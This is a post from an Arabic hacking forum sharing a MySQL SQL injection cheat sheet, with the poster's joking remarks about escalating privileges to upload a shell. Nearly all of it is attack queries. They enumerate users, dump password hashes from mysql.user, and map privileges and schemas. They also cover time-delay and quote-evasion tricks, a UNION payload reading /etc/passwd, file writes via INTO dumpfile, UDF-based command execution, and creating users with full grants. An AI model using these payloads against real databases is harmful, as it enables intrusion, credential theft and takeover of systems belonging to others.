:: vBspiders Professional Network :: - Injection Cheat Sheet

السلام عليكم ورحمه الله وبركاته

اليوم جبت لكم موضوع روعه تحبونه كلكم

لكن الي راح تزعلو منه اني مش راح اترجم لانه امر ومعناه وما يصح ترجمته

ركزو تفهمو ن :]

mysql-sql-injection-cheat-sheet

Version

كود:

SELECT @@version

Comments

كود:

 SELECT 1; #comment

SELECT /*comment*/1;

Current User

كود:

SELECT user();

 SELECT system_user();

List Users

كود:

SELECT user FROM mysql.user; -- priv

List Password Hashes

كود:

SELECT host, user, password FROM mysql.user; -- priv

Password Cracker

كود:

John the Ripper will crack MySQL password hashes

.

List Privileges

كود:

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs

كود:



SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs

فوق امر برايفت عشان نرفع شيل هع هع خليكم تكتشفونه لحالكم ما رح اكمل كلام ............

كود:

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)

كود:

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts

كود:

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

كود:

SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database

كود:

SELECT database()

List Databases

كود:

SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0

كود:

SELECT distinct(db) FROM mysql.db -- priv8

List Tables

كود:

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name

كود:

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'

Select Nth Row

كود:

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0

Select Nth Char

كود:

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

كود:

SELECT 6 & 2; # returns 2

كود:

SELECT 6 & 1; # returns 0

ASCII Value -> Char

كود:

SELECT char(65); # returns A

Char -> ASCII Value

كود:

SELECT ascii('A'); # returns 65

Casting

كود:

SELECT cast('1' AS unsigned integer);

SELECT cast('123' AS char);

String Concatenation

كود:

 SELECT CONCAT('A','B'); #returns AB

SELECT CONCAT('A','B','C'); # returns ABC

If Statement

كود:



 SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement

كود:

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes

كود:



SELECT 0x414243; # returns ABC

Time Delay

كود:

SELECT BENCHMARK(1000000,MD5('A'));

SELECT SLEEP(5); # >= 5.0.12

Command Execution
بصراحه اول مره اسمع فيها بس قويه كثير :S
بحاول انزل لكم عليها فيديو

كود:

If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.

Local File Access

كود:

...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read 

world-readable files.

كود:

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system

خخ بتوقع الامر الثاني يعجبكم كثير :]

Create Users

كود:

CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users

كود:

DROP USER test1; -- priv

Make User DBA

كود:

GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files

كود:

SELECT @@datadir

;

اتمنا انكم تفهمو الاستعلاماات :D

موفقين